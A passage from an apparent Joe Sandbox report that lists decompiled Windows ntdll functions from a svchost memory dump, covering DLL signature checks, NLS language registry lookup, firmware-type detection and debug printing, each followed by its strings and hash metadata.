                                          				signed char* _t108;
                                          				intOrPtr _t112;
                                          				intOrPtr _t124;
                                          				intOrPtr _t125;
                                          				intOrPtr _t126;
                                          
                                          				_t107 = __edx;
                                          				_v12 = __ecx;
                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                          				_t124 = 0;
                                          				_v20 = __edx;
                                          				if(E03A3CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                          					_t112 = _v8;
                                          				} else {
                                          					_t112 = 0;
                                          					_v8 = 0;
                                          				}
                                          				if(_t112 != 0) {
                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                          						_t124 = 0xc000007b;
                                          						goto L8;
                                          					}
                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                          					 *(_t125 + 0x34) = _t73;
                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                          						goto L3;
                                          					}
                                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                          					_t124 = E03A2C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                          					if(_t124 < 0) {
                                          						goto L8;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					L3:
                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                          						L8:
                                          						return _t124;
                                          					}
                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                          							goto L5;
                                          						}
                                          						_t102 =  *0x3b15780; // 0x0
                                          						if((_t102 & 0x00000003) != 0) {
                                          							E03AA5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                          							_t102 =  *0x3b15780; // 0x0
                                          						}
                                          						if((_t102 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          						_t124 = 0xc0000428;
                                          						goto L8;
                                          					}
                                          					L5:
                                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                          						goto L8;
                                          					}
                                          					_t77 = _a4 - 0x40000003;
                                          					if(_t77 == 0 || _t77 == 0x33) {
                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                          						if(E03A47D50() != 0) {
                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          						} else {
                                          							_t82 = 0x7ffe0384;
                                          						}
                                          						_t108 = 0x7ffe0385;
                                          						if( *_t82 != 0) {
                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                          								if(E03A47D50() == 0) {
                                          									_t97 = 0x7ffe0385;
                                          								} else {
                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          								}
                                          								if(( *_t97 & 0x00000020) != 0) {
                                          									E03AA7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						if(_a4 != 0x40000003) {
                                          							L14:
                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                          							if(E03A47D50() != 0) {
                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          							} else {
                                          								_t87 = 0x7ffe0384;
                                          							}
                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                          								if(E03A47D50() != 0) {
                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          								}
                                          								if(( *_t108 & 0x00000020) != 0) {
                                          									E03AA7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                          								}
                                          							}
                                          							goto L8;
                                          						} else {
                                          							_v16 = _t125 + 0x24;
                                          							_t124 = E03A5A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                          							if(_t124 < 0) {
                                          								E03A2B1E1(_t124, 0x1490, 0, _v16);
                                          								goto L8;
                                          							}
                                          							goto L14;
                                          						}
                                          					} else {
                                          						goto L8;
                                          					}
                                          				}
                                          			}





















                                          Strings
                                          • minkernel\ntdll\ldrmap.c, xrefs: 03A898A2
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 03A89891
                                          • LdrpCompleteMapModule, xrefs: 03A89898
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 7064fe49e5dc543081a5b59cf698b9d0ce59001b93f80e81cd1154f92e3229e7
                                          • Instruction ID: 1790a13a8ae043bb714205e022f594f846e82fe606fe4b042b4dd1d2b4130836
                                          • Opcode Fuzzy Hash: 7064fe49e5dc543081a5b59cf698b9d0ce59001b93f80e81cd1154f92e3229e7
                                          • Instruction Fuzzy Hash: 04511371A057419BD722DB68C944B2ABBE4BF42714F280A9FF8619B7E1C731ED00CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E03A2E620(void* __ecx, short* __edx, short* _a4) {
                                          				char _v16;
                                          				char _v20;
                                          				intOrPtr _v24;
                                          				char* _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v44;
                                          				signed int _v48;
                                          				intOrPtr _v52;
                                          				void* _v56;
                                          				void* _v60;
                                          				char _v64;
                                          				void* _v68;
                                          				void* _v76;
                                          				void* _v84;
                                          				signed int _t59;
                                          				signed int _t74;
                                          				signed short* _t75;
                                          				signed int _t76;
                                          				signed short* _t78;
                                          				signed int _t83;
                                          				short* _t93;
                                          				signed short* _t94;
                                          				short* _t96;
                                          				void* _t97;
                                          				signed int _t99;
                                          				void* _t101;
                                          				void* _t102;
                                          
                                          				_t80 = __ecx;
                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                          				_t96 = __edx;
                                          				_v44 = __edx;
                                          				_t78 = 0;
                                          				_v56 = 0;
                                          				if(__ecx == 0 || __edx == 0) {
                                          					L28:
                                          					_t97 = 0xc000000d;
                                          				} else {
                                          					_t93 = _a4;
                                          					if(_t93 == 0) {
                                          						goto L28;
                                          					}
                                          					_t78 = E03A2F358(__ecx, 0xac);
                                          					if(_t78 == 0) {
                                          						_t97 = 0xc0000017;
                                          						L6:
                                          						if(_v56 != 0) {
                                          							_push(_v56);
                                          							E03A695D0();
                                          						}
                                          						if(_t78 != 0) {
                                          							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                          						}
                                          						return _t97;
                                          					}
                                          					E03A6FA60(_t78, 0, 0x158);
                                          					_v48 = _v48 & 0x00000000;
                                          					_t102 = _t101 + 0xc;
                                          					 *_t96 = 0;
                                          					 *_t93 = 0;
                                          					E03A6BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                          					_v36 = 0x18;
                                          					_v28 =  &_v44;
                                          					_v64 = 0;
                                          					_push( &_v36);
                                          					_push(0x20019);
                                          					_v32 = 0;
                                          					_push( &_v64);
                                          					_v24 = 0x40;
                                          					_v20 = 0;
                                          					_v16 = 0;
                                          					_t97 = E03A69600();
                                          					if(_t97 < 0) {
                                          						goto L6;
                                          					}
                                          					E03A6BB40(0,  &_v36, L"InstallLanguageFallback");
                                          					_push(0);
                                          					_v48 = 4;
                                          					_t97 = L03A2F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                          					if(_t97 >= 0) {
                                          						if(_v52 != 1) {
                                          							L17:
                                          							_t97 = 0xc0000001;
                                          							goto L6;
                                          						}
                                          						_t59 =  *_t78 & 0x0000ffff;
                                          						_t94 = _t78;
                                          						_t83 = _t59;
                                          						if(_t59 == 0) {
                                          							L19:
                                          							if(_t83 == 0) {
                                          								L23:
                                          								E03A6BB40(_t83, _t102 + 0x24, _t78);
                                          								if(L03A343C0( &_v48,  &_v64) == 0) {
                                          									goto L17;
                                          								}
                                          								_t84 = _v48;
                                          								 *_v48 = _v56;
                                          								if( *_t94 != 0) {
                                          									E03A6BB40(_t84, _t102 + 0x24, _t94);
                                          									if(L03A343C0( &_v48,  &_v64) != 0) {
                                          										 *_a4 = _v56;
                                          									} else {
                                          										_t97 = 0xc0000001;
                                          										 *_v48 = 0;
                                          									}
                                          								}
                                          								goto L6;
                                          							}
                                          							_t83 = _t83 & 0x0000ffff;
                                          							while(_t83 == 0x20) {
                                          								_t94 =  &(_t94[1]);
                                          								_t74 =  *_t94 & 0x0000ffff;
                                          								_t83 = _t74;
                                          								if(_t74 != 0) {
                                          									continue;
                                          								}
                                          								goto L23;
                                          							}
                                          							goto L23;
                                          						} else {
                                          							goto L14;
                                          						}
                                          						while(1) {
                                          							L14:
                                          							_t27 =  &(_t94[1]); // 0x2
                                          							_t75 = _t27;
                                          							if(_t83 == 0x2c) {
                                          								break;
                                          							}
                                          							_t94 = _t75;
                                          							_t76 =  *_t94 & 0x0000ffff;
                                          							_t83 = _t76;
                                          							if(_t76 != 0) {
                                          								continue;
                                          							}
                                          							goto L23;
                                          						}
                                          						 *_t94 = 0;
                                          						_t94 = _t75;
                                          						_t83 =  *_t75 & 0x0000ffff;
                                          						goto L19;
                                          					}
                                          				}
                                          			}































                                          0x03a85450
                                          0x03a85452
                                          0x03a85455
                                          0x03a8545a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a8545c
                                          0x03a8546a
                                          0x03a8546d
                                          0x03a8546f
                                          0x00000000
                                          0x03a8546f
                                          0x03a2e70f

                                          Strings
                                          • @, xrefs: 03A2E6C0
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 03A2E68C
                                          • InstallLanguageFallback, xrefs: 03A2E6DB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: bd0c0f8b6819e6c3494afa31f077fbf46df2e89a2bc2247948cf9d4ec3e2011a
                                          • Instruction ID: 8980428b382d2bb489f8409ef2dda99c07a3724b4f3ccf3feb8e03b27324593a
                                          • Opcode Fuzzy Hash: bd0c0f8b6819e6c3494afa31f077fbf46df2e89a2bc2247948cf9d4ec3e2011a
                                          • Instruction Fuzzy Hash: 2A51EF769083159BC714EF29C440AABB3E8BF9A714F09096FF995DB240FB34D944C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E03AEE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v40;
                                          				char _v44;
                                          				intOrPtr _v48;
                                          				signed int _v52;
                                          				unsigned int _v56;
                                          				char _v60;
                                          				signed int _v64;
                                          				char _v68;
                                          				signed int _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				char _t87;
                                          				signed int _t90;
                                          				signed int _t94;
                                          				signed int _t100;
                                          				intOrPtr* _t113;
                                          				signed int _t122;
                                          				void* _t132;
                                          				void* _t135;
                                          				signed int _t139;
                                          				signed int* _t141;
                                          				signed int _t146;
                                          				signed int _t147;
                                          				void* _t153;
                                          				signed int _t155;
                                          				signed int _t159;
                                          				char _t166;
                                          				void* _t172;
                                          				void* _t176;
                                          				signed int _t177;
                                          				intOrPtr* _t179;
                                          
                                          				_t179 = __ecx;
                                          				_v48 = __edx;
                                          				_v68 = 0;
                                          				_v72 = 0;
                                          				_push(__ecx[1]);
                                          				_push( *__ecx);
                                          				_push(0);
                                          				_t153 = 0x14;
                                          				_t135 = _t153;
                                          				_t132 = E03AEBBBB(_t135, _t153);
                                          				if(_t132 == 0) {
                                          					_t166 = _v68;
                                          					goto L43;
                                          				} else {
                                          					_t155 = 0;
                                          					_v52 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v56 = __ecx[1];
                                          					if( *__ecx >> 8 < 2) {
                                          						_t155 = 1;
                                          						_v52 = 1;
                                          					}
                                          					_t139 = _a4;
                                          					_t87 = (_t155 << 0xc) + _t139;
                                          					_v60 = _t87;
                                          					if(_t87 < _t139) {
                                          						L11:
                                          						_t166 = _v68;
                                          						L12:
                                          						if(_t132 != 0) {
                                          							E03AEBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                          						}
                                          						L43:
                                          						if(_v72 != 0) {
                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                          							_push( *_t179);
                                          							_push(0x8000);
                                          							E03AEAFDE( &_v72,  &_v60);
                                          						}
                                          						L46:
                                          						return _t166;
                                          					}
                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                          					asm("sbb edi, edi");
                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                          					if(_t90 != 0) {
                                          						_push(0);
                                          						_push(0x14);
                                          						_push( &_v44);
                                          						_push(3);
                                          						_push(_t179);
                                          						_push(0xffffffff);
                                          						if(E03A69730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                          							_push(_t139);
                                          							E03AEA80D(_t179, 1, _v40, 0);
                                          							_t172 = 4;
                                          						}
                                          					}
                                          					_t141 =  &_v72;
                                          					if(E03AEA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                          						_v64 = _a4;
                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                          						asm("sbb edi, edi");
                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                          						if(_t94 != 0) {
                                          							_push(0);
                                          							_push(0x14);
                                          							_push( &_v24);
                                          							_push(3);
                                          							_push(_t179);
                                          							_push(0xffffffff);
                                          							if(E03A69730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                          								_push(_t141);
                                          								E03AEA80D(_t179, 1, _v20, 0);
                                          								_t176 = 4;
                                          							}
                                          						}
                                          						if(E03AEA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                          							goto L11;
                                          						} else {
                                          							_t177 = _v64;
                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                          							_t100 = _v52 + _v52;
                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                          							 *(_t132 + 0x10) = _t146;
                                          							asm("bsf eax, [esp+0x18]");
                                          							_v52 = _t100;
                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                          							_t47 =  &_a8;
                                          							 *_t47 = _a8 & 0x00000001;
                                          							if( *_t47 == 0) {
                                          								E03A42280(_t179 + 0x30, _t179 + 0x30);
                                          							}
                                          							_t147 =  *(_t179 + 0x34);
                                          							_t159 =  *(_t179 + 0x38) & 1;
                                          							_v68 = 0;
                                          							if(_t147 == 0) {
                                          								L35:
                                          								E03A3B090(_t179 + 0x34, _t147, _v68, _t132);
                                          								if(_a8 == 0) {
                                          									E03A3FFB0(_t132, _t177, _t179 + 0x30);
                                          								}
                                          								asm("lock xadd [eax], ecx");
                                          								asm("lock xadd [eax], edx");
                                          								_t132 = 0;
                                          								_v72 = _v72 & 0;
                                          								_v68 = _v72;
                                          								if(E03A47D50() == 0) {
                                          									_t113 = 0x7ffe0388;
                                          								} else {
                                          									_t177 = _v64;
                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          								}
                                          								if( *_t113 == _t132) {
                                          									_t166 = _v68;
                                          									goto L46;
                                          								} else {
                                          									_t166 = _v68;
                                          									E03ADFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                          									goto L12;
                                          								}
                                          							} else {
                                          								L23:
                                          								while(1) {
                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                          										_t122 =  *_t147;
                                          										if(_t159 == 0) {
                                          											L32:
                                          											if(_t122 == 0) {
                                          												L34:
                                          												_v68 = 0;
                                          												goto L35;
                                          											}
                                          											L33:
                                          											_t147 = _t122;
                                          											continue;
                                          										}
                                          										if(_t122 == 0) {
                                          											goto L34;
                                          										}
                                          										_t122 = _t122 ^ _t147;
                                          										goto L32;
                                          									}
                                          									_t122 =  *(_t147 + 4);
                                          									if(_t159 == 0) {
                                          										L27:
                                          										if(_t122 != 0) {
                                          											goto L33;
                                          										}
                                          										L28:
                                          										_v68 = 1;
                                          										goto L35;
                                          									}
                                          									if(_t122 == 0) {
                                          										goto L28;
                                          									}
                                          									_t122 = _t122 ^ _t147;
                                          									goto L27;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_v72 = _v72 & 0x00000000;
                                          					goto L11;
                                          				}
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: 9e8650a14ebe93d6a1525dcd98b68ca9339a7f15e9fce95325bc9820f31644fb
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: 9F919F356043419FE724CF25C941F1BB7E6AF85714F18892EF9A9CB290E774E904CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E03AA51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed short* _t63;
                                          				signed int _t64;
                                          				signed int _t65;
                                          				signed int _t67;
                                          				intOrPtr _t74;
                                          				intOrPtr _t84;
                                          				intOrPtr _t88;
                                          				intOrPtr _t94;
                                          				void* _t100;
                                          				void* _t103;
                                          				intOrPtr _t105;
                                          				signed int _t106;
                                          				short* _t108;
                                          				signed int _t110;
                                          				signed int _t113;
                                          				signed int* _t115;
                                          				signed short* _t117;
                                          				void* _t118;
                                          				void* _t119;
                                          
                                          				_push(0x80);
                                          				_push(0x3b005f0);
                                          				E03A7D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                          				_t115 =  *(_t118 + 0xc);
                                          				 *(_t118 - 0x7c) = _t115;
                                          				 *((char*)(_t118 - 0x65)) = 0;
                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                          				_t113 = 0;
                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                          				_t100 = __ecx;
                                          				if(_t100 == 0) {
                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                          					E03A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          					 *((char*)(_t118 - 0x65)) = 1;
                                          					_t63 =  *(_t118 - 0x90);
                                          					_t101 = _t63[2];
                                          					_t64 =  *_t63 & 0x0000ffff;
                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                          					L20:
                                          					_t65 = _t64 >> 1;
                                          					L21:
                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                          					if(_t108 == 0) {
                                          						L27:
                                          						 *_t115 = _t65 + 1;
                                          						_t67 = 0xc0000023;
                                          						L28:
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                          						L29:
                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                          						E03AA53CA(0);
                                          						return E03A7D130(0, _t113, _t115);
                                          					}
                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                          							 *_t108 = 0;
                                          						}
                                          						goto L27;
                                          					}
                                          					 *_t115 = _t65;
                                          					_t115 = _t65 + _t65;
                                          					E03A6F3E0(_t108, _t101, _t115);
                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                          					_t67 = 0;
                                          					goto L28;
                                          				}
                                          				_t103 = _t100 - 1;
                                          				if(_t103 == 0) {
                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                          					_t74 = E03A43690(1, _t117, 0x3a01810, _t118 - 0x74);
                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                          					_t101 = _t117[2];
                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                          					if(_t74 < 0) {
                                          						_t64 =  *_t117 & 0x0000ffff;
                                          						_t115 =  *(_t118 - 0x7c);
                                          						goto L20;
                                          					}
                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                          					_t115 =  *(_t118 - 0x7c);
                                          					goto L21;
                                          				}
                                          				if(_t103 == 1) {
                                          					_t105 = 4;
                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                          					_push(_t118 - 0x70);
                                          					_push(0);
                                          					_push(0);
                                          					_push(_t105);
                                          					_push(_t118 - 0x78);
                                          					_push(0x6b);
                                          					 *((intOrPtr*)(_t118 - 0x64)) = E03A6AA90();
                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                          					_t113 = L03A44620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                          					if(_t113 != 0) {
                                          						_push(_t118 - 0x70);
                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                          						_push(_t113);
                                          						_push(4);
                                          						_push(_t118 - 0x78);
                                          						_push(0x6b);
                                          						_t84 = E03A6AA90();
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                          						if(_t84 < 0) {
                                          							goto L29;
                                          						}
                                          						_t110 = 0;
                                          						_t106 = 0;
                                          						while(1) {
                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                          							 *(_t118 - 0x88) = _t106;
                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                          								break;
                                          							}
                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                          							_t106 = _t106 + 1;
                                          						}
                                          						_t88 = E03AA500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                          						_t119 = _t119 + 0x1c;
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                          						if(_t88 < 0) {
                                          							goto L29;
                                          						}
                                          						_t101 = _t118 - 0x3c;
                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                          						goto L21;
                                          					}
                                          					_t67 = 0xc0000017;
                                          					goto L28;
                                          				}
                                          				_push(0);
                                          				_push(0x20);
                                          				_push(_t118 - 0x60);
                                          				_push(0x5a);
                                          				_t94 = E03A69860();
                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                          				if(_t94 < 0) {
                                          					goto L29;
                                          				}
                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                          					_t101 = L"Legacy";
                                          					_push(6);
                                          				} else {
                                          					_t101 = L"UEFI";
                                          					_push(4);
                                          				}
                                          				_pop(_t65);
                                          				goto L21;
                                          			}























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 2fec2af3934aed42ce11c6ecfcfe45353c7b96995e43c5c4e821e4ac274c5824
                                          • Instruction ID: fc530a7c71fdd0ac00120890d2b8e677e40c0a497e0802847a813bf8589160da
                                          • Opcode Fuzzy Hash: 2fec2af3934aed42ce11c6ecfcfe45353c7b96995e43c5c4e821e4ac274c5824
                                          • Instruction Fuzzy Hash: 9D516FB2E00B089FDB24DFA8C990AAEB7F8BF85700F14406EE549EB251D771D901CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E03A2B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                          				signed int _t65;
                                          				signed short _t69;
                                          				intOrPtr _t70;
                                          				signed short _t85;
                                          				void* _t86;
                                          				signed short _t89;
                                          				signed short _t91;
                                          				intOrPtr _t92;
                                          				intOrPtr _t97;
                                          				intOrPtr* _t98;
                                          				signed short _t99;
                                          				signed short _t101;
                                          				void* _t102;
                                          				char* _t103;
                                          				signed short _t104;
                                          				intOrPtr* _t110;
                                          				void* _t111;
                                          				void* _t114;
                                          				intOrPtr* _t115;
                                          
                                          				_t109 = __esi;
                                          				_t108 = __edi;
                                          				_t106 = __edx;
                                          				_t95 = __ebx;
                                          				_push(0x90);
                                          				_push(0x3aff7a8);
                                          				E03A7D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                          				if(__edx == 0xffffffff) {
                                          					L6:
                                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                          					__eflags = _t65 & 0x00000002;
                                          					if((_t65 & 0x00000002) != 0) {
                                          						L3:
                                          						L4:
                                          						return E03A7D130(_t95, _t108, _t109);
                                          					}
                                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                          					_t108 = 0;
                                          					_t109 = 0;
                                          					_t95 = 0;
                                          					__eflags = 0;
                                          					while(1) {
                                          						__eflags = _t95 - 0x200;
                                          						if(_t95 >= 0x200) {
                                          							break;
                                          						}
                                          						E03A6D000(0x80);
                                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                          						_t108 = _t115;
                                          						_t95 = _t95 - 0xffffff80;
                                          						_t17 = _t114 - 4;
                                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                          						__eflags =  *_t17;
                                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                          						_t102 = _t110 + 1;
                                          						do {
                                          							_t85 =  *_t110;
                                          							_t110 = _t110 + 1;
                                          							__eflags = _t85;
                                          						} while (_t85 != 0);
                                          						_t111 = _t110 - _t102;
                                          						_t21 = _t95 - 1; // -129
                                          						_t86 = _t21;
                                          						__eflags = _t111 - _t86;
                                          						if(_t111 > _t86) {
                                          							_t111 = _t86;
                                          						}
                                          						E03A6F3E0(_t108, _t106, _t111);
                                          						_t115 = _t115 + 0xc;
                                          						_t103 = _t111 + _t108;
                                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                          						_t89 = _t95 - _t111;
                                          						__eflags = _t89;
                                          						_push(0);
                                          						if(_t89 == 0) {
                                          							L15:
                                          							_t109 = 0xc000000d;
                                          							goto L16;
                                          						} else {
                                          							__eflags = _t89 - 0x7fffffff;
                                          							if(_t89 <= 0x7fffffff) {
                                          								L16:
                                          								 *(_t114 - 0x94) = _t109;
                                          								__eflags = _t109;
                                          								if(_t109 < 0) {
                                          									__eflags = _t89;
                                          									if(_t89 != 0) {
                                          										 *_t103 = 0;
                                          									}
                                          									L26:
                                          									 *(_t114 - 0xa0) = _t109;
                                          									 *(_t114 - 4) = 0xfffffffe;
                                          									__eflags = _t109;
                                          									if(_t109 >= 0) {
                                          										L31:
                                          										_t98 = _t108;
                                          										_t39 = _t98 + 1; // 0x1
                                          										_t106 = _t39;
                                          										do {
                                          											_t69 =  *_t98;
                                          											_t98 = _t98 + 1;
                                          											__eflags = _t69;
                                          										} while (_t69 != 0);
                                          										_t99 = _t98 - _t106;
                                          										__eflags = _t99;
                                          										L34:
                                          										_t70 =  *[fs:0x30];
                                          										__eflags =  *((char*)(_t70 + 2));
                                          										if( *((char*)(_t70 + 2)) != 0) {
                                          											L40:
                                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
